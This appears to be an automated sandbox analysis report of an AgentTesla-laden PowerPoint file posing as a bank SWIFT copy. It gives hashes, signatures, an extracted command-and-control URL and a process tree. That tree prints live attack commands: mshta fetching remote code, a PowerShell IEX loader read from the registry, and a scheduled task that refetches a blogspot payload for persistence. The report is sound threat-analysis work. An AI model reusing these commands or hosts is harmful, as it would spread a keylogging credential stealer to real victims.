Overview

overview

10

Static

static

8

BankSwiftC...00.pps

windows7_x64

10

BankSwiftC...00.pps

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 09:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BankSwiftCopyUSD95000.pps

  • Size

    99KB

  • MD5

    7f0b415d0b7a76530b2f510a910811e5

  • SHA1

    480594ad26c91dd9d719c80334285375540dc83e

  • SHA256

    8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019

  • SHA512

    d9b3320b51f390a6f75e7e3102044557e6476103c94ec4451819b78b4503f8018fee7ce8f70657473b310b14b752935fac2b7e5caaeb318e09a9af317701d8f4

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

C2

http://64.188.18.218/webpanel-st/inc/6295ae82aa2db6.php

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 4 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\BankSwiftCopyUSD95000.pps"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1036
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1044
      • C:\Windows\SysWOW64\ping.exe
        ping.exe
        2⤵
        • Process spawned unexpected child process
        • Runs ping.exe
        PID:556
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://1230948%1230948%1230948%[email protected]/dbgghasdnasdjasgdakgsdhv
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit ((gp HKCU:\Software).meather)|IEX
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • Drops file in Drivers directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1972
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://randikhanaekminar.blogspot.com/p/st2.html""\"", 0 : window.close"\")
          3⤵
          • Creates scheduled task(s)
          PID:1320
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1576
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im winword.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im EXCEL.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:940
      • C:\Windows\SysWOW64\ping.exe
        ping.exe
        2⤵
        • Process spawned unexpected child process
        • Runs ping.exe
        PID:680

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/112-5-0x000007FEF7880000-0x000007FEF7AFA000-memory.dmp

      Filesize

      2.5MB

      Download

    • memory/556-3-0x0000000000000000-mapping.dmp

      Download

    • memory/680-6-0x0000000000000000-mapping.dmp

      Download

    • memory/940-13-0x0000000000000000-mapping.dmp

      Download

    • memory/1044-2-0x0000000000000000-mapping.dmp

      Download

    • memory/1048-32-0x00000000062C0000-0x00000000062C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-24-0x0000000005770000-0x0000000005771000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-35-0x0000000001E30000-0x0000000001E38000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1048-34-0x00000000062F0000-0x0000000006300000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1048-11-0x0000000072DE0000-0x00000000734CE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/1048-12-0x0000000002180000-0x0000000002181000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-7-0x0000000000000000-mapping.dmp

      Download

    • memory/1048-14-0x00000000049A0000-0x00000000049A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-15-0x00000000025C0000-0x00000000025C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-16-0x0000000005350000-0x0000000005351000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-19-0x0000000005720000-0x0000000005721000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-33-0x00000000065F0000-0x00000000065F1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1048-25-0x0000000006360000-0x0000000006361000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1320-8-0x0000000000000000-mapping.dmp

      Download

    • memory/1576-9-0x0000000000000000-mapping.dmp

      Download

    • memory/1580-10-0x0000000000000000-mapping.dmp

      Download

    • memory/1956-4-0x0000000000000000-mapping.dmp

      Download

    • memory/1972-36-0x0000000000400000-0x000000000043C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/1972-37-0x00000000004376FE-mapping.dmp

      Download

    • memory/1972-38-0x0000000000400000-0x000000000043C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/1972-39-0x0000000000400000-0x000000000043C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/1972-40-0x0000000072DE0000-0x00000000734CE000-memory.dmp

      Filesize

      6.9MB

      Download